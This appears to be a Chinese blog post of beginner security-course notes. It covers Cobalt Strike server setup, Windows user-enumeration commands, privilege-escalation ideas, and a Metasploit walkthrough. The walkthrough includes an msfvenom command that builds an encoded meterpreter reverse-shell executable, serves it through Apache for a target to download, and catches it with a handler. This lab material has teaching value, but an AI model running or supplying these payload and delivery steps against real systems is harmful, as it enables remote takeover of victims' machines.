Day9(网络安全)

已于 2024-09-09 08:36:18 修改
阅读量694 收藏 9
点赞数 22
文章标签: web安全 安全
于 2024-09-06 08:32:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63142536/article/details/141949508
版权

目录

安装CS

用户组和用户、windows信息搜集命令

手工提权思路,土豆提权

土豆提权

思路

CS插件提权

MSF提权

安装CS

将CS文件解压过后,将文件中的server文件夹上传到VPS。

之后进入VPS,对其中的teamserver和TeamServerImage进行权限设置

对应命令chmod +x teamserver       chmod +x TeamServerImage

之后可以进行服务端设置其格式为:”./teamserver  your.ip  your.password”

之后可以切到本机,或虚拟机中,开启CS文件中的client文件。打开里面的CS的vbs文件,之后进入连接画面

输入我们之前设置好的ip和password,点击连接即可。

用户组和用户、windows信息搜集命令

Windows系统中,用户组和用户信息的搜集可以通过多种命令实现。以下是一些常用的命令及其功能总结:

一.查看所有用户:

        命令: net user

        功能: 列出系统中所有用户账户。

二.查看用户详细信息:

        命令: net user [用户名]

        功能: 显示指定用户的详细信息,包括全名、组成员身份、密码信息等。

三.查看所有用户组:

        命令: net localgroup

        功能: 列出系统中所有本地用户组。

四.查看用户组详细信息:

        命令: net localgroup [组名]

        功能: 显示指定用户组的详细信息,包括组成员。

五.查看计算机信息:

        命令: systeminfo

        功能: 显示计算机的详细配置信息,包括操作系统版本、内存、网络适配器等。

六.查看当前登录用户:

        命令: whoami

        功能: 显示当前登录用户的用户名。

七.查看用户登录历史:

        命令: net user [用户名] | find "Last logon"

        功能: 显示指定用户的最后登录时间。

手工提权思路,土豆提权

          

土豆提权

从网站上获取土豆家族的exe文件,有可能一次,两次会失败,可使用其他的土豆进行提权。

思路

手工提权(Privilege Escalation)是指攻击者通过各种手段提升其在系统中的权限,以获得更高的控制权。以下是一些常见的手工提权思路:

一.用户和组权限审计:

        检查当前用户的权限和所属用户组,寻找具有更高权限的组(如管理员组)并尝试加入。

二.弱密码和凭证:

        尝试使用常见的弱密码进行登录,或查找存储在文件中的凭证(如配置文件、脚本等)。

三.服务和计划任务:

        检查系统中运行的服务和计划任务,寻找以高权限运行的服务,尝试利用其配置错误或漏洞。

四.文件和目录权限:

        审计文件和目录的权限,寻找可写的系统文件(如 /etc/passwd  Windows 系统目录下的文件),尝试替换或修改。

五.漏洞利用:

        查找系统和应用程序的已知漏洞,利用这些漏洞进行提权。

六.环境变量和配置文件:

        检查环境变量和配置文件,寻找可能的敏感信息或错误配置。

七.DLL劫持:

        利用DLL劫持技术,在高权限应用程序中注入恶意DLL

八.内核漏洞:

        如果有访问权限,可以尝试利用内核漏洞进行提权。

九.社交工程:

        通过社交工程手段获取管理员的凭证或权限。

十.利用第三方软件:

        检查系统中安装的第三方软件,寻找可能的提权漏洞。

CS插件提权

进入CS,点击左上角的CS,其中有脚本控制器(scripts),在这个模块中可以添加一些有用的插件或脚本,这些东西需自己下载,随后可以使用这些工具对其目标进行提权操作。

MSF提权

在这里我并没有直接将生成文件交付给目标,而是通过将文件移至apache服务目录中,使目标访问地址进行下载。

通过指令,生成一个木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=*  LPORT=*   -b "\x00" -e x86/shikata_ga_nai -f exe -o wang.exe

复制wang.exe木马文件到apache访问页,在kali linux上启动apache

root@wangzhike:~# cp wang.exe /var/www/html/
root@wangzhike:~# service apache2 start
root@wangzhike:~# service postgresql start
 

改名/var/www/html/目录中其他的测试页,避免访问出现其他画面

root@wangzhike:~# cd /var/www/html/
root@wangzhike:/var/www/html# ls
index.html  index.nginx-debian.html  wang.exe
root@wangzhike:/var/www/html# mv index.html index.html.bak
root@wangzhike:/var/www/html# mv index.nginx-debian.html index.nginx-debian.html.bak
 

本机访问你的虚拟机的ip

之后下载木马

利用exploit/multi/handler模块攻击

之后本机点击木马,虚拟机上显示监听,之后可进行提权操作。

m0_63142536
关注
网络安全课程day1
TangTang_AM的博客
10-26 2152
ip地址详解 局域网:一般称为内网 简单局域网构成:交换机 网线 pc 交换机:组建局域网最重要的设备 路由器:链接内网和外网 ip地址:网络编码(二进制)32位二进制组成 范围:0-255 子网掩码: 局域网通信规则:同一个局域网同一个网段。 ...
网络安全学习笔记Day01—Day10
u014136101的博客
07-15 1781
①数据库(DB)是按照统一格式存放在一起的数据,作为企业管理系统的后台一台服务器可以部署多个数据库一个数据库可以包含多张表(用来存储具体的数据,由“记录”和“字段”组成)一个表中包含多条记录(行=“记录”)一条记录包含多个字段(列=“字段”)②数据管理员(DBA)③数据库的管理系统(DBMS)维护数据库并有效的访问数据库的各部分数据(增、删、改、查)④常见的数据库管理系统正向解析名字>>>IP反向解析IP>>>名字②早期域名解析方法C③常见的顶级域名(一级)组织域。...
网络安全day01
Paranoid_truggle的博客
10-09 2071
ip地址的构成是网络位加主机位,网络位相同的IP地址才能为同一网段 ipconfig 查看IP地址的基本信息 ipconfig /all 查看IP地址的所有信息 nslookup www.baidu.com 手工解析域名的IP地址 ping命令详解 ping 10.1.1.2 可以测试延迟 ping www.baidu.com -t :Ping 指定的计算机直到中断。 -a :将地址解析为计算机名。 -n count :发送 count 指定的 ECHO 数据包数。默认值为 4。 -l size :发送包含
网络安全学习Day1
weixin_44770698的博客
04-06 3289
刚开始学习网安的小白,发布的这些只是每天自己学习的东西做一个总结,如果哪里不对的地方,恳请大佬们指点,非常感谢,希望能够跟着CSDN的大佬们一起进步! 本地host文件与DNS的关系: 在DNS解析某个域名的时候,如果本地的host文件中没有该域名对应的ip地址,则寻找DNS域名服务器进行解析,如果有则会查找host文件中的相应的记录,从而使得域名解析的速度更快。就像我们在用steam进行下载游戏时,可能会出现下载速度过慢的情况,此时我们便会使用相关的加速器,...
网络安全实训Day16
Yisitelz的博客
04-26 2622
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
56篇网络安全技战法,HW期间专用哦
08-16
56篇网络安全技战法,HW期间专用哦 技战法0Day漏洞逆向利用线下社工防护自动化封禁IP 技战法-利用反控木马精准诱捕 技战法-基于办公OA系统的社会工程学防护技战法 HW下的邮件攻防场景技战法 基于欺骗与应急场景构建...
网络安全工程师(千峰教育)笔记
11-03
b站的千峰老师的网络安全工程师的系列课程的笔记,自己整理的,pdf版本,内容包含day2--------day24。
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 016-网络安全应急技术与实践(Web层-应急响应技术总结)
热门推荐
时光隧道
02-11 7万+
Web安全事件应急响应技术是指针对Web应用程序遭受风险和安全漏洞的事件,如网络攻击、数据泄露、恶意软件等,迅速采取措施进行监测、分析和应对的技术手段。应急响应技术描述1. 监测和日志分析通过实时监测和分析Web应用程序的日志,以便发现异常活动和潜在的安全威胁。2. 威胁情报收集与分析收集和分析来自多个来源的威胁情报,以帮助识别和应对潜在威胁。3. 漏洞扫描和漏洞管理通过定期对Web应用程序进行漏洞扫描,及时发现和修复潜在的安全漏洞。4. 网络流量分析。
【XA.DAY.4】网络安全体系与模型
dropnine的博客
01-10 3846
网络安全体系主要特征: 1.整体性。 2.协同性。 3.过程性。 4.全面性。 5.适应性。 网络安全体系安全模型: BLP机密性模型: BLP模型用于防止非授权信息的扩散,从而保证系统的安全。 BLP机密性模型可用于实现军事安全策略。为了实现军事安全策略,计算机系统中的信息和用户都分配了一个访问类,它由两部分组成: 安全级:对应,公开<秘密<机密<绝密 范畴集:指安全级的有效领域或信息所归属领域,如部门人事处、财务部等。 特点:简单安全特性、*特性。 1.简单安
下一代网络安全解决方案.pdf
09-20
特别的,新型安全攻击方式如利用O Day漏洞的攻击和APT攻击正快速增长,使得网络安全形势更加严峻。 在这样的背景下,传统的基于P2DR模型的安全防护体系已经不能满足当前的网络安全需求。P2DR模型包括策略、防护、...
网络安全】漏洞挖掘之CVE-2019-9670+检测工具
等风来
09-09 247
CVE-2019-9670 是一个与相关的严重漏洞。ZCS 中的 AutoDiscover 服务存在不正确的 XML 解析处理,该漏洞可被利用来注入恶意 XML 代码(例如外部实体注入(XXE)攻击),从而导致服务器任意文件读取或远程代码执行 (RCE)。Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行。
网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 393
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
Web安全之SQL注入:如何预防及解决
J老熊
09-07 1479
SQL注入是一种通过在用户输入中嵌入恶意SQL代码的攻击方式。攻击者可以利用漏洞在未经授权的情况下访问数据库,执行原本不被允许的操作。例如,攻击者可以绕过身份验证、检索敏感信息,甚至删除数据。SQL注入是Web应用程序中最常见且最危险的安全漏洞之一,尤其是在涉及数据库操作的场景下,如电商交易系统。通过使用、严格的输入验证、最小权限原则以及使用ORM框架等方法,我们可以有效防止SQL注入攻击。开发人员需要养成良好的编码习惯,始终考虑潜在的安全问题,确保应用程序的安全性。
网络安全】服务基础第二阶段——第三节:Linux系统管理基础----Linux用户与组管理
goldfish8848的博客
09-07 780
SUID、SGID 和 Sticky Bit 都在Linux提权中扮演了重要⻆⾊。
如何启动网络安全计划:首先要做的事情
网络研究观
09-07 989
保护数据不是一次性的活动,而是一个持续的适应和改进过程。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1847
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全】漏洞挖掘:文件上传实现Webshell
等风来
09-10 270
接着,我上传webshell.php文件,文件内容为payload,拦截请求包,将文件名修改为jpg,但回显错误,这说明服务器验证了文件的内容。
网络安全】-文件上传漏洞
最新发布
weixin_65311462的博客
09-10 833
文件上传漏洞指hacker能利用网站能让用户上传文件的功能,在上传过程中上传木马,直接连接或配合文件包含漏洞获取webshell,从而导致用户权限丢失,隐私泄露。成功getshell后hacker还可以长期控制受影响的网站或服务器,进行持续性的攻击和破坏,甚至会将受控制的服务器作为攻击其他目标的跳板,利用该服务器的资源和网络带宽发起更广泛的网络攻击。
网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1253
准备:一句话木马:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值